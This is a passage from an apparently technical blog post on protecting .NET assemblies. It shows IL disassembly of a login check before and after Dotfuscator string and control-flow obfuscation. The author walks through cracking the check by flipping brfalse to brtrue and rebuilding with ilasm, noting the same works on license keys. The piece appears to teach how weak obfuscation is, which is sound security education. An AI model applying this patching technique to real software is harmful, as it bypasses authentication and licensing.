class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>// Code size<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>44 (0x2c)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>.maxstack<SPAN>&nbsp; </SPAN>8<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0000:<SPAN>&nbsp; </SPAN>ldarg.0<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0001:<SPAN>&nbsp; </SPAN>call<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>instance bool a::c()<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0006:<SPAN>&nbsp; </SPAN>brfalse.s<SPAN>&nbsp; </SPAN>IL_001a<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0008:<SPAN>&nbsp; </SPAN>ldstr<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>"access granted"<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_000d:<SPAN>&nbsp; </SPAN>call<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>valuetype [System.Windows.Forms]System.Windows.Forms.DialogResult [System.Windows.Forms]System.Windows.Forms.MessageBox::Show(string)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0012:<SPAN>&nbsp; </SPAN>pop<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0013:<SPAN>&nbsp; </SPAN>ldarg.0<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0014:<SPAN>&nbsp; </SPAN>call<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>instance void a::b()<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0019:<SPAN>&nbsp; </SPAN>ret<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_001a:<SPAN>&nbsp; </SPAN>ldstr<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>"invalid credentials"<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_001f:<SPAN>&nbsp; </SPAN>call<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>valuetype [System.Windows.Forms]System.Windows.Forms.DialogResult [System.Windows.Forms]System.Windows.Forms.MessageBox::Show(string)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0024:<SPAN>&nbsp; </SPAN>pop<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0025:<SPAN>&nbsp; </SPAN>ldarg.0<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0026:<SPAN>&nbsp; </SPAN>call<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>instance void [System.Windows.Forms]System.Windows.Forms.Form::Close()<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_002b:<SPAN>&nbsp; </SPAN>ret<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp; </SPAN>} // end of method a::a<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN>As we can see again that our messages string is written in plain text also the used .net framework namespaces and here comes our message box again System.Windows.Forms.MessageBox::Show(string)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>So what the problem in this? The problem that the old cracking techniques that were used with win32 applications can still be applied to .net assemblies very easily, so if I’m an experienced cracker I would disassemble this application into IL and search for the “invalid credentials” string that shows in my face every time I write in an invalid password and look up a few lines till I find the branching statement at line IL_0006 and easily I would change from brfalse to brtrue and build the application using ilasm<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN>C:\Program Files\Microsoft Visual Studio 8\VC&gt;ilasm c:\password.il /out=c:\password.exe<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN>So next time I run the new built application when I supply an invalid user name and password I will get the welcome message saying “access granted” instead of being kicked out. And as it’s very obvious the same can be applied for cracking license keys and similar stuff.<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>But that was because my current obfuscation tool didn’t obfuscate the messages strings, right? So what if we obfuscate every available string in my application too, I will be doing this using the evaluation version of dotfuscator which have a feature called “string encryption” which personally I don’t consider encryption rather than ecoding or obfuscation because you can’t encrypt things and supply the encryption algorithm and key with it. So here is the disassemebled code after the string obfuscation<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN>.method private hidebysig instance void <o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>eval_a(object A_0,<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>class [mscorlib]System.EventArgs A_1) cil managed<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp; </SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>// Code size<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>71 (0x47)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>.maxstack<SPAN>&nbsp; </SPAN>9<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>.locals init (int32 V_0)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0000:<SPAN>&nbsp; </SPAN>ldc.i4<SPAN>&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>0x3<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0005:<SPAN>&nbsp; </SPAN>stloc<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>V_0<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0009:<SPAN>&nbsp; </SPAN>ldarg.0<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_000a:<SPAN>&nbsp; </SPAN>call<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>instance bool eval_a::eval_c()<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_000f:<SPAN>&nbsp; </SPAN>brfalse.s<SPAN>&nbsp; </SPAN>IL_002c<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0011:<SPAN>&nbsp; </SPAN>ldstr<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>bytearray (F0 90 F2 90 F4 96 F6 92 F8 8A FA 88 FC DD FE 98 <o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>00 73 02 62 04 6B 06 73 08 6C 0A 6F )<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>// .s.b.k.s.l.o<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0016:<SPAN>&nbsp; </SPAN>ldloc<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>V_0<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_001a:<SPAN>&nbsp; </SPAN>call<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>string a$PST06000001(string,<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>int32)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_001f:<SPAN>&nbsp; </SPAN>call<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>valuetype [System.Windows.Forms]System.Windows.Forms.DialogResult [System.Windows.Forms]System.Windows.Forms.MessageBox::Show(string)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0024:<SPAN>&nbsp; </SPAN>pop<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0025:<SPAN>&nbsp; </SPAN>ldarg.0<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0026:<SPAN>&nbsp; </SPAN>call<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>instance void eval_a::b()<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_002b:<SPAN>&nbsp; </SPAN>ret<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_002c:<SPAN>&nbsp; </SPAN>ldstr<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>bytearray (F0 98 F2 9D F4 83 F6 96 F8 95 FA 92 FC 99 FE DF <o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>00 62 02 71 04 60 06 63 08 6C 0A 65 0C 79 0E 66<SPAN>&nbsp;&nbsp; </SPAN>// .b.q.`.c.l.e.y.f<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>10 70 12 7F 14 66 )<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>// .p...f<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0031:<SPAN>&nbsp; </SPAN>ldloc<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>V_0<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0035:<SPAN>&nbsp; </SPAN>call<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>string a$PST06000001(string,<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>int32)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_003a:<SPAN>&nbsp; </SPAN>call<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>valuetype [System.Windows.Forms]System.Windows.Forms.DialogResult [System.Windows.Forms]System.Windows.Forms.MessageBox::Show(string)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_003f:<SPAN>&nbsp; </SPAN>pop<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0040:<SPAN>&nbsp; </SPAN>ldarg.0<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0041:<SPAN>&nbsp; </SPAN>call<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>instance void [System.Windows.Forms]System.Windows.Forms.Form::Close()<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0046:<SPAN>&nbsp; </SPAN>ret<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp; </SPAN>} // end of method eval_a::eval_a<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN>Note: the “eval” prefix is because I’m using an evaluation version of the dotfuscator<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN>As we can see all of the strings have been obfuscated, but still all the .net framework used classes and methods names still in plain text and readable to anyone and that is because you can obfuscate anything but the .net framework namespaces, classes and methods because if you obfuscated there names how you are going to call them on your user machine?<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>so again if I’m an experienced cracker and I know what I’m looking for I will be looking for the most rare .net framework methods and classes that have been called within this application, for example the MessageBox is a very good example also the Form::Close() is another good option so I would search for them in the new IL and again look up for a few lines searching for the branching statement till I find it at line IL_000f and again I will change it from brfalse to brtrue and build again my application using ilasm and when I run it I will get another access granted message and as you can see it took me only 5 minutes<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN>but that because the application flow was so clear and it wasn’t obfuscated, right? So what if we obfuscate the application flow too using the “Control Flow obfuscation” feature in dotfuscator? The output IL is going to look like this<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN>.method private hidebysig instance void <o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>eval_a(object A_0,<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>class [mscorlib]System.EventArgs A_1) cil managed<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp; </SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>// Code size<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>81 (0x51)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>.maxstack<SPAN>&nbsp; </SPAN>2<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>.locals init (int32 V_0)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0000:<SPAN>&nbsp; </SPAN>ldc.i4<SPAN>&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>0xa<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0005:<SPAN>&nbsp; </SPAN>stloc<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>V_0<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0009:<SPAN>&nbsp; </SPAN>ldarg.0<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_000a:<SPAN>&nbsp; </SPAN>call<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>instance bool eval_a::eval_c()<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_000f:<SPAN>&nbsp; </SPAN>brfalse.s<SPAN>&nbsp; </SPAN>IL_0036<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0011:<SPAN>&nbsp; </SPAN>ldc.i4.1<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0012:<SPAN>&nbsp; </SPAN>br.s<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>IL_0017<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0014:<SPAN>&nbsp; </SPAN>ldc.i4.0<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0015:<SPAN>&nbsp; </SPAN>br.s<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>IL_0017<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0017:<SPAN>&nbsp; </SPAN>brfalse.s<SPAN>&nbsp; </SPAN>IL_0019<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0019:<SPAN>&nbsp; </SPAN>br.s<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>IL_001b<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_001b:<SPAN>&nbsp; </SPAN>ldstr<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>bytearray (57 39 59 39 5B 3F 5D 3B 5F 13 61 11 63 44 65 01<SPAN>&nbsp;&nbsp; </SPAN>// W9Y9[?];_.a.cDe.<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>67 1A 69 0B 6B 02 6D 1A 6F 15 71 16 )<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>// g.i.k.m.o.q.<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0020:<SPAN>&nbsp; </SPAN>ldloc<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>V_0<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0024:<SPAN>&nbsp; </SPAN>call<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>string a$PST06000001(string,<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>int32)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0029:<SPAN>&nbsp; </SPAN>call<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>valuetype [System.Windows.Forms]System.Windows.Forms.DialogResult [System.Windows.Forms]System.Windows.Forms.MessageBox::Show(string)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_002e:<SPAN>&nbsp; </SPAN>pop<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_002f:<SPAN>&nbsp; </SPAN>ldarg.0<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0030:<SPAN>&nbsp; </SPAN>call<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>instance void eval_a::b()<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0035:<SPAN>&nbsp; </SPAN>ret<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0036:<SPAN>&nbsp; </SPAN>ldstr<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>bytearray (57 31 59 34 5B 2A 5D 3F 5F 0C 61 0B 63 00 65 46<SPAN>&nbsp;&nbsp; </SPAN>// W1Y4[*]?_.a.c.eF<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</SPAN>67 0B 69 18 6B 09 6D 0A 6F 15 71 1C 73 00 75 1F<SPAN>&nbsp;&nbsp; </SPAN>// g.i.k.m.o.q.s.u.<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>77 19 79 16 7B 0F )<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>// w.y.{.<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_003b:<SPAN>&nbsp; </SPAN>ldloc<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>V_0<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_003f:<SPAN>&nbsp; </SPAN>call<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>string a$PST06000001(string,<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;</SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>int32)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0044:<SPAN>&nbsp; </SPAN>call<SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>valuetype [System.Windows.Forms]System.Windows.Forms.DialogResult [System.Windows.Forms]System.Windows.Forms.MessageBox::Show(string)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_0049:<SPAN>&nbsp; </SPAN>pop<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>IL_004a:<SPAN>&nbsp; </SPAN>ldarg.0<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; 